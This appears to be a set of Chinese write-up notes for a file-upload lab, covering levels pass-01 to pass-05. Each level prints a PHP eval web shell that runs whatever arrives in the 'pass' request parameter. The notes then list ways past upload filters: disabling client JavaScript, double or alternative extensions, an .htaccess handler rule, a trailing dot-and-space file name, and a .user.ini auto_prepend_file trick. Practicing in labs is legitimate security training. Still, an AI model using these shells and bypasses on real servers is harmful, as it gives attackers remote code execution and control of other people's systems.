0x0 pass-01

#shell
<?php @eval($_REQUEST['pass']);
    echo "i am a house"?>

关闭js进行上传
getshell

0x1 pass-02

#shell
<?php @eval($_REQUEST['pass']);
    echo "i am a house"?>

修改文件类型为shell.php.jpg
getshell

0x2 pass-03

#shell
<?php @eval($_REQUEST['pass']);
    echo "i am a house"?>

修改文件类型为shell.php5
需要服务器允许上传并且可以解析 .php5 .php3 .phtml等文件
getshell

0x3 pass-04

#shell
<?php @eval($_REQUEST['pass']);
    echo "i am a house"?>

phpstudy需要设置允许上传.htaccess文件

<FilesMatch "shell_04.jpg">  
		SetHandler application/x-httpd-php
</FilesMatch>
#让服务器以php的方式解析,shell_04.jpg

getshell

0x4 pass-05

0x4.1 第一种思路:点、空格、点

#shell
<?php @eval($_REQUEST['pass']);
    echo "i am a house";
    phpinfo();?>

使用burpsuite改包上传shell_05.php
shell_05.php. .
 空格

getshll

0x4.2 第二种思路:.user.ini文件

具体可以参考

思路:.user.ini会让当前目录下的每个.php文件都执行一次.user.ini中指定的文件
设置.user.ini文件的内容为:auto_prepend_file=01.gif
然后再执行相同路径文件夹下的.php文件
执行图片马